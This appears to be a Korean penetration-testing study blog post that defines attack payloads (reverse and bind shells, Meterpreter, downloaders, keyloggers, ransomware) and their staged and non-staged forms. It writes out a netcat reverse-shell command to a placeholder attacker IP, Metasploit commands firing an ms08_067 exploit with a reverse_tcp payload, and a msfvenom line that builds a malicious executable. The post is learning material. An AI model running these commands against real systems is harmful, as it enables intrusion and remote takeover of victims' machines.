모의해킹

페이로드

editor9386 2025. 2. 12. 23:39

보통 it 쪽에서 페이로드란 전송되는 데이터를 페이로드라고 부르고

보안 쪽에서 페이로드도 전송되는 데이터는 데이터인데 원래의 의도와 다르게 쿼리의 구조나 논리를 변경하는 실질적인 악의 적인 코드나 데이터를 페이로드라고 한다.

 

 

"페이로드(payload)"란, 공격자가 SQL Injection을 시도할 때 입력하는 악의적인 SQL 코드나 데이터를 의미해. 즉, 웹 애플리케이션의 입력창에 넣는 문자열 그 자체인데, 이 문자열이 원래 의도한 데이터가 아니라 쿼리의 논리나 구조를 변경하기 위해 삽입되는 코드를 말해.

 

**페이로드(Payload)**는 공격자가 목표 시스템을 침해하거나 악성 코드를 실행하기 위해 사용하는 코드 또는 데이터의 조각을 의미해. 쉽게 말해서, 페이로드는 공격을 수행하는 "실제 공격 내용"이야.

💡 비유하자면:

  • 공격 도구(Exploit)가 총이라면,
  • 페이로드는 총알이라고 생각하면 돼.

즉, **익스플로잇(Exploit)**이 시스템의 취약점을 이용해 문을 연다면, **페이로드(Payload)**는 그 문을 통해 침입해서 원하는 작업을 수행하는 코드야.

🔥 페이로드의 주요 기능

페이로드는 다양한 기능을 수행할 수 있어. 대표적인 기능은 다음과 같아:

  1. Reverse Shell (역방향 쉘)
    • 공격자가 피해자의 시스템에 침투한 후, 원격에서 조작할 수 있도록 하는 페이로드.
    • 피해자가 공격자의 시스템과 연결을 맺어서, 공격자가 명령을 실행할 수 있어.
    • 예시: 위 명령어는 Netcat을 이용해서 공격자의 시스템으로 역방향 쉘을 생성하는 거야.
    • bash
      복사편집
      nc -e /bin/bash 공격자_IP 4444
  2. Bind Shell (바인드 쉘)
    • 피해자의 시스템에서 특정 포트를 열어두고, 공격자가 접속할 수 있도록 하는 페이로드.
    • 보안 시스템에 의해 탐지될 가능성이 높아서 잘 사용되지 않아.
  3. Meterpreter
    • Metasploit에서 제공하는 강력한 페이로드로, 피해 시스템에 원격 접근하고 다양한 공격을 수행할 수 있어.
    • 파일 업로드/다운로드, 화면 캡처, 키로깅 등 다양한 기능을 제공함.
  4. Downloader (악성코드 다운로드)
    • 피해자의 시스템에 침입한 후, 추가적인 악성코드를 다운로드하고 실행하는 페이로드.
    • 예시: 사용자가 감염된 문서를 열었을 때, 실제 악성코드를 다운로드해서 실행함.
  5. Privilege Escalation (권한 상승)
    • 낮은 권한의 사용자가 루트(root) 또는 관리자 권한을 획득하도록 돕는 페이로드.
    • sudo나 SUID 권한을 이용해서 권한을 상승하는 방법이 있음.
  6. Keylogger (키로거)
    • 사용자가 입력하는 키보드 입력을 가로채서 저장하는 페이로드.
    • 피해자의 로그인 정보나 민감한 데이터를 훔치는 데 사용됨.
  7. Ransomware (랜섬웨어)
    • 피해자의 파일을 암호화하고, 해독을 위해 금전을 요구하는 페이로드.
    • 예시: WannaCry 같은 랜섬웨어 공격.

🎯 페이로드의 종류

페이로드는 실행 방식에 따라 크게 스태거드(staged) 페이로드 논스태거드(non-staged) 페이로드로 나뉘어.

페이로드 유형설명

Staged (단계적 실행) 작은 페이로드를 먼저 실행한 후, 더 큰 페이로드를 불러오는 방식. 탐지율이 낮고, 공격을 우회하기 좋음.
Non-Staged (단일 실행) 한번에 전체 페이로드를 실행하는 방식. 실행 속도가 빠르지만, 탐지될 확률이 높음.

Metasploit에서는 보통 페이로드 이름이 **"staged"**인지 **"non-staged"**인지 구분할 수 있어.

  • Staged 예시: windows/meterpreter/reverse_tcp
  • Non-Staged 예시: windows/meterpreter_reverse_tcp

📌 Metasploit에서 페이로드 사용 예시

Metasploit은 모의해킹에서 자주 사용되는 도구야. 여기서 페이로드를 설정하는 기본적인 방법을 보여줄게.

1️⃣ 사용 가능한 페이로드 목록 보기

bash
복사편집
msfvenom -l payloads

2️⃣ 특정 페이로드 선택

예를 들어, Windows 시스템을 대상으로 하는 역방향 쉘 페이로드를 선택한다고 해보자.

bash
복사편집
use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 # 공격자의 IP set LPORT 4444 # 사용할 포트 exploit

이렇게 설정하면, 공격 대상이 감염되었을 때 공격자의 IP로 접속을 시도하게 돼.

3️⃣ 페이로드를 이용해 악성 실행 파일 만들기

bash
복사편집
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > exploit.exe

위 명령어는 악성 exploit.exe 파일을 생성하고, 실행되면 공격자의 Metasploit 세션으로 접속하는 페이로드를 포함하고 있어.

'모의해킹' 카테고리의 다른 글

XML/XPath Injection (Login Form)  (0) 2025.02.20
SQL Injection - Blind - Time-Based  (0) 2025.02.13
SQL injection - blind (Boolean-Based)  (0) 2025.02.12
XSS - Stored (Blog)  (0) 2025.02.12
SQL Injection  (0) 2025.01.24

'모의해킹'의 다른글

  • 현재글페이로드

관련글

티스토리툴바